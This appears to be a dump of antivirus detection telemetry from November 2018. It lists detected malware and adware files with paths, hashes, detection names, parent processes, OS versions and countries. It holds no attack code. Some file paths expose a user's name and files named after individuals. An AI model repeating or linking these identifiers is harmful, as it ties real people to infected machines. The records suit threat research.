  Row(detection=Row(filename='j.exe', filepath='C:\\ProgramData\\AllSaver\\J.exe', filesize=704000, name='ADWARE/MultiPlug.Gen.#M300.#R6864'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline='--engine=2 --session-id=NEk3Mu9iP1Jl7knGdwZd8AKuEdvTSSEGt2u2cEhE --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=12084856, timestamp='2018-11-01T10:44:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='igfxcfg.exe', filepath='I:\\Driver\\899_drivers\\Intel\\I855GME\\VGA\\Windrv\\win2k_xp\\Win2000\\igfxcfg.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='cbf328b7c3f73826e74227b18f44747c265688096e6c01ed6f92671c33e6cfbb', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T12:06:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='advertisement.pif', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 8.3.2\\Advertisement\\Advertisement.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-092509-c0125a95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e97d068\\AVSCAN-20181101-092410-B6C41C15\\AVSCAN-20181101-092509-C0125A95', filesize=768000, name='TR/Dropper.Gen.#M1.#R1'), hash='d1a821971ed8642d258ee65db27b91fddd28d902f9ec4e17322a39ee7beb6b5d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:25:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124410-fe337e96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124351-ED50CFA0\\AVSCAN-20181101-124410-FE337E96', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:44:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hpqemlsz.exe', filepath='C:\\Program Files\\HP\\Digital Imaging\\bin\\hpqEmlsz.exe', filesize=208000, name='W32/Infector.Gen.#M300.#R7863'), hash='b27fd6d9d2d1258e55c8d4ee6cc12716563a84353bd92ba692613b07886e5106', metadata=Row(cmdline='-u -p 4660 -s 140', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WerFault.exe', parentsize=360448, timestamp='2018-11-01T15:14:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00008b14', filepath='C:\\Windows\\Temp\\1a64367a-4a2e-48c9-b633-ef33c12e4522\\tmp0000023a\\tmp00008b14', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='9be09266d1dff546ca3ac72759750ffa23fda80e1ca22869be96209739f67cf4', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-01T10:15:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112214-4fdcd0dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112214-4FDCD0DD', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:21:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124603-5e923207', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124543-4D59DD7A\\AVSCAN-20181101-124603-5E923207', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:46:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='31ff15ab22ee5139b49e75fb904cc26476776f08299231e80fcfc0465caf22e9', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T14:46:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tsmuxer.exe', filepath='C:\\Program Files\\FormatFactory\\FFModules\\Encoder\\tsMuxer.exe', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='678d2ed0ab506f2611775ebe28f6f2b3222918655a28bee19c98f405e89351db', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:15:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002243-39f5f636', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002243-39F5F636', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:22:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003243-7b0e4b40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003243-7B0E4B40', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:32:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename="احمد الالمانى's files.exe", filepath="I:\\.Trashes\\احمد الالمانى's Files.exe", filesize=512000, name='TR/Dropper.Gen.#M300.#R241'), hash='83ef079fb538f232884ca1f3c64ad14e939d3ddcf013d1089320abc77477beab', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:21:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.17610_none_755d8d6179bb210c\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='403c1be317f33ec1926ed717b60ee11e8e46e2b3f7fc2e2a3944a0c473fc4e53', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:33:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa5656.6783\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa5656.6783\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T21:42:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dxa8bb8.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxa8BB7.tmp\\dxa8BB8.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T10:30:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gicytower .exe', filepath='\\?\\J:\\العاب\\ICYTOWER\\gICYTOWER .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='2104e8b1ef162497271a4b1ca026066dadbac39ae39485746567bf774174530a', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:48:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161416-e4cc9a3a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161416-E4CC9A3A', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='30a90e52ae113aef6cee733c2ae574ae8d3523e80d83efa68668b5ccfa5d555a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:14:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\GUMCB99.tmp\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:11:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124204-4df5643e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5383533\\AVSCAN-20181101-123838-2D9A4924\\AVSCAN-20181101-124204-4DF5643E', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='687dba07f7e20457df2c5640ea4017d06bae98bb510dab3a22a274c65f8216e6', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:44:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235846-a17fcde1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0dd13b79\\AVSCAN-20181101-235114-7A2EFC9A\\AVSCAN-20181101-235846-A17FCDE1', filesize=720000, name='PUA/InstallCore.Gen.#M300.#R5961'), hash='4c5c004da602b9987c77d72298376c54115f60e08681f691396081a53216e2fb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T15:58:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003252-7bfe90dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003252-7BFE90DC', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:32:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-234546-d6178bce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0c39edaa\\AVSCAN-20181101-234457-CCF35733\\AVSCAN-20181101-234546-D6178BCE', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T21:45:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-144432-935583c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b808b86\\AVSCAN-20181101-143634-5BCAC3D6\\AVSCAN-20181101-144432-935583C2', filesize=768000, name='TR/Drop.Agent.768000.#M1.#R1'), hash='41c1866fe221cb8e5e4ab7fe5c3ceb2441bb1f5148af6427e1d8b8f96b868102', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:44:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pfusstwainentry0416.dll', filepath='C:\\Program Files\\fiScanner\\ScandAll PRO\\PfuSsTwainEntry0416.dll', filesize=172000, name='W32/Ramnit.C.#M1.#R1'), hash='84d14f762fb86749aa3ba633b26f035e2d0a43b556bde23228041b4d966e29d0', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T08:42:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-133536-e50ee31e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c2778959\\AVSCAN-20181101-133138-C0FA5D07\\AVSCAN-20181101-133536-E50EE31E', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:35:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-192812-754b0454', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_93383960\\AVSCAN-20181101-192759-736C8209\\AVSCAN-20181101-192812-754B0454', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:28:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smagent.exe', filepath='D:\\BKP HD\\Lixo 2\\Desktop 2015\\BKP Servidor\\CPD\\DOWNLOADS\\Drivers\\AD1888_2KXP_5410\\SM_Panel\\Sys\\SMAgent.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='2c3b00898a5677c6a4385ac8ae8402e20c5343d81fd991adf1a29ca2708cba3a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T13:59:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodelaycomp.dll', filepath='C:\\Program Files\\FreeTime\\FormatFactory\\FFModules\\RMCodecs\\tools\\audiodelaycomp.dll', filesize=260000, name='W32/Ramnit.C.#M0.#R0'), hash='3c296e7a0aacbbd797d193eee5f116fe7548f0ce2eb3949e72595505106f9985', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T04:58:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='suepatch0709.exe', filepath='\\\\?\\O:\\Laufwerk E\\Lager\\Downlods\\Spiele\\suepatch0709.exe', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='088b22321aa05cfdf9e13fac048aeed924c9b6d98a7a371201fd3a63c14fbdc3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:25:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\0i5wl434rvp\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541022074.5bda217a515ec', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Backs\\402281976.exe', parentsize=671232, timestamp='2018-11-01T08:38:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T18:51:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\program files (x86)\\avira\\antivirus\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='9817ab650882f71b16a47cdef489c0c1edde5abeec990a9c55e601cc33cab0d3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:12:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152400-a04b6113', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152400-A04B6113', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:24:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Desktop\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CZ.#M1.#R1'), hash='ea74978487a83ede72c7c95d321d0481ce24c66b678af4114b16d4f89b1e09a5', metadata=Row(cmdline=None, country='QA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T10:26:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194737-4fc2585f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194737-4FC2585F', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:47:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='balini marta.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 574309\\BALINI MARTA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:28:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information.exe', filepath='G:\\System Volume Information\\System Volume Information.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:46:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xkkdofnt.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\XkkDofNt.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rischi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\CORSO CARVICO\\SICUREZZA NEI LUOGHI DI LAVORO\\RISCHI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:23:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwr_server_behaviors_sb_33.html', filepath='C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\Dreamweaver\\9.0_Extending\\dwr_server_behaviors_sb_33.html', filesize=116000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='d33ddce829b0e380244358922c831c331dbab3722bbc94bc835f430157e22625', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T09:11:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gbpsv.exe', filepath='E:\\gbpsv.exe', filesize=3968000, name='TR/Banker.D.7539712.#M1.#R1'), hash='bbfdfb74207c8cf9f0b50dd09e872b20189db4acd59cc3f191907592df5fe95b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:47:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='liveupdatelauncher.exe', filepath='C:\\Program Files (x86)\\Avanquest update\\LiveUpdateLauncher.exe', filesize=96000, name='W32/Neshta.A.#M1.#R1'), hash='a3f6f1a158bbc795c73b6df26e16b5582448b68e41de3a3bf5411b16a18fb5fa', metadata=Row(cmdline='\\\\\\/c', country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=185672, timestamp='2018-11-01T10:29:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154610-ce259c23', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154555-CB8F528F\\AVSCAN-20181101-154610-CE259C23', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212355-eed2a5b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212355-EED2A5B9', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_2e9b0140_30ab8c89_bd613be2.vir', filepath='\\\\?\\C:\\Applications\\Service_2e9b0140_30ab8c89_bd613be2.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150414-bd2ca1f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150414-BD2CA1F7', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:04:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\usgi1s1einj\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:42:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_19473900.vir', filepath='\\\\?\\C:\\Applications\\Service_19473900.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:43Z'), dt=datetime.date(2018, 11, 1)),
